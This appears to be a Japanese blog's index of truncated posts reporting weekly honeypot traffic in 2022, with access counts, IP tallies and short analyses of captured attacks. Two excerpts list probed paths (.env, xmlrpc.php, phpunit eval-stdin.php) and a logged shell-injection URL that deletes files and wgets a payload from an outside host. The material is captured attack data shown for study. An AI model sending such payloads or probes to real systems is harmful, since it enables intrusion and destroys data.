２０２２年９月１２日から９月１８日までのハニーポットへのアクセス記録をレポートします。 デイリーアクセス 日付 アクセス数 2022-09-12 51 2022-09-13 84 2022-09-14 97 2022-09-15 85 2022-09-16 194 2022-09-17 72 2022-09-18 65 ipアドレス別アクセス…

今週のハニーポットアクセスをレポートします。 デイリーアクセス 日付 アクセス数 2022-09-03 4 2022-09-04 140 2022-09-05 100 2022-09-06 82 2022-09-07 229 2022-09-08 239 2022-09-09 528 2022-09-10 249 2022-09-11 155 ipアドレス別アクセス数 IPアド…

２０２２年８月２８日から〜９月３日のハニーポットアクセスレポート。 デイリーアクセス 日付 アクセス数 2022-08-28 35 2022-08-29 879 2022-08-30 371 2022-08-31 384 2022-09-01 976 2022-09-02 62 2022-09-03 68 IPアドレス別アクセス数 IPアドレス ア…

デイリーアクセス 80〜100程度のアクセスが続く週となりました。 日付 アクセス 2022-08-21 7 2022-08-22 70 2022-08-23 103 2022-08-24 81 2022-08-25 84 2022-08-26 79 2022-08-27 105 2022-08-28 95 このラインより上のエリアが無料で表示されます。 IPア…

今週(8/14~8/21)のハニーポットへのアクセスをレポートします。 お盆の時期のハニーポットへのアクセスは8/14と8/21にアクセスが多くなりました。 デイリーアクセス ipアドレス別アクセス数 ステータスコード別アクセス数 HTTPメソッド別アクセス数 参考書籍…

2022年8月7日〜8月13日のハニーポットへのアクセスログをレポートします。今週は月曜、土曜日にアクセスが多くなりました。 デイリーアクセス 日付 アクセス数 2022-08-07 1 2022-08-08 170 2022-08-09 68 2022-08-10 83 2022-08-11 80 2022-08-12 58 2022-0…

７月３１日から８月７日のハニーポットアクセスログ集計を報告します。 デイリーアクセス 2022-07-31 41 2022-08-01 56 2022-08-02 100 2022-08-03 87 2022-08-04 159 2022-08-05 116 2022-08-06 84 2022-08-07 85 ipアドレス別アクセス数 182.234.79.223 10…

７月１７日から７月２４日のハニーポットアクセスログ集計を報告します。今週も落ち着いたアクセスになっています。 デイリーアクセス数 2022-07-17 32 2022-07-18 70 2022-07-19 99 2022-07-20 59 2022-07-21 76 2022-07-22 64 2022-07-23 189 2022-07-24 8…

７月３日〜７月１２日のハニーポットアクセスログ集計を報告します。 デイリーアクセスログ 今週は落ち着いたアクセス数です。 2022-07-03 9 2022-07-04 81 2022-07-05 56 2022-07-06 188 2022-07-07 82 2022-07-08 69 2022-07-09 199 2022-07-10 58 2022-07…

今週のハニーポットアクセスログです。 デイリーアクセス ipアドレス別アクセス数 ステータスコード別 HTTPリクエスト別 参考書籍 デイリーアクセス 今週はおとなしいアクセスになりました。 2022-06-21 83 2022-06-22 72 2022-06-23 63 2022-06-25 58 2022-…

ハニーポットへのアクセス状況。 アクセス数 ipアドレス別アクセス ステータスコード別 HTTPリクエスト別 アクセス数 2022-05-29 43 2022-05-30 277 2022-05-31 119 2022-06-01 625 2022-06-02 113 2022-06-03 110 2022-06-04 94 2022-06-05 2094 ipアドレス…

５月２２日から５月２９日のハニーポットのアクセス状況をレポートします。 今週は意外にも週明けの平日にアクセスが集中しました。 首脳会談があった日ですが影響しているのでしょうか？ アクセス数 2022-05-22 24 2022-05-23 456 2022-05-24 2104 2022-05-…

５月１５日から５月２２日までのハニーポットへのアクセスをまとめました。 アクセス数 ５月２０日にアクセスが急激に多くなりました。 daily access count 2022-05-15 26 2022-05-16 53 2022-05-17 103 2022-05-18 66 2022-05-19 114 2022-05-20 2078 2022-…

今週のハニーポットへのアクセス状況をお知らせします。 アクセス数 ipアドレス別アクセス数 ステータスコード別アクセス数 HTTPメソッド別カウント 参考書籍 アクセス数 今週は落ち着いたアクセス数になりました。 daily access count 2022-05-01 3 2022-05…

５月１日週のハニーポットアクセス状況はこちら！ 週刊アクセス数 ipアドレス別アクセス数 URL別アクセス数 HTTPステータスコード HTTPリクエスト数 参考書籍 週刊アクセス数 ４月３０日ゴールデンウィークの始まりにアクセスが多いですね。乗っ取れそうなサ…

今週のハニーポットアクセス状況をレポートします。 週刊アクセス数 ４月２４日（日）のアクセスが2000を超えて高くなっています。また４月１８日（月）も416アクセスと高くなっています。 2022-04-17 24 2022-04-18 416 2022-04-19 69 2022-04-20 77 2022-0…

４月１０日〜４月１７日のハニーポットアクセスログをレポートします。 アクセス数 IPアドレス別アクセス数 ステータスコード レスポンスコード 参考書籍 アクセス数 ４月１７日（日）のアクセスが2000を超えています。そのほかは落ち着いた１週間となりまし…

４月３日〜４月１０日までのハニーポットへのアクセスログをレポートします。 アクセス数 IPアドレス別アクセス数 HTTPリクエストメソッド集計 HTTPステータスコード集計 アクセス数 ４月８日、４月９日に2000を超えるアクセスが来ています。その他のアクセ…

３月２７日から４月３日のハニーポットへのアクセスをレポートします。 週刊アクセス数 ３月２９日、３０日、４月３日にアクセスが２０００を超えています。 ipアドレスアクセス数 今週アクセスしてきたipアドレス別のアクセス数です。下記３つのipアドレス…

３月２０日〜３月２７日までのハニーポットへのアクセスレポート。 アクセス数 ipアドレス別アクセス数 HTTPリクエストメソッド HTTPステータスコード HTTP アクセスURL数 ハニーポット参考書籍 アクセス数 週刊アクセス数です。今週は１００程度のアクセス…

３月１５日〜３月２０日のハニーポットのログのサマリーをレポートします。 デイリーアクセス HTTPアクセス HTTPステータスコード HTTPリクエスト ipアドレス別アクセス数トップ１０ ハニーポット参考書籍 デイリーアクセス ３月１６日、１７日にアクセスが…

ハニーポットのログを自動集計してcsvファイルに保存し、自分のPCに転送するスクリプトを作成していました。しかし、ログ作成部分のスクリプトはエラーで最後にログファイルをリフレッシュする部分は動くのでちょうどログファイルだけ消えるという珍事により…

今日来た攻撃の中から1件取り出して分析します。 今日来たアクセスのデータは以下になります。 アクセスログデータ POST /xmlrpc.php HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Content-Length: …

月初めでログを集計するスクリプトが動いてるか確認する時に間違えて、コマンドを打ってしまいログが消えました・・・ 上ボタンで過去に打ったコマンドを使おうとして、放ったコマンド。 $ sed -i '' -e 'd' hoge.txt ログファイルが消えてった・・・・ 今月…

ハニーポットを構築してからほとんどがGETリクエストでとりあえずつつく攻撃でしたので200レスポンスかログインアクセスをしてくるレスポンスとして401がほとんどでした。 本日のログに初めて201レスポンスを返す攻撃が来ました。 HTTPリクエストに関しては…

２月１５日、１６日に1000を超えるアクセスがありました。 ipアドレスを日別で集計すると犯人が見つかりました。下記が集計結果です。 2001 2022-02-16 201.218.229.228 2001 2022-02-15 201.218.229.228 1650 2022-02-16 210.210.26.37 541 2022-02-09 60.2…

下記のログを分析していくよ！ 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 19 /favicon.ico 17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.syt…

ハニーポットのアクセスログを見ていきます。 ログの集計期間は2/3〜2/16です。 アクセスログの中から10アクセス以上のURLを抽出しました。 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/…

ハニーポットを植えてから１０日ほど経ちました。アクセス数を見ます。２月９日のアクセスが急激に伸びてます。基本的には土日のアクセスが多そうですね。急激なアクセスの後はアクセス数７０程度で推移しています。この日に何が起きていたのでしょう？？ 次…

今日来たアクセスを分析していきます。 ログの中から下記アクセスを見ていきます。 167.94.146.59 XXXXXXXXXXX "GET / HTTP/1.1" 200 False ※XXXXはマスクしてあります。 167.94.146.59のGETアクセスをしてきています。 base64でエンコードされている部分を…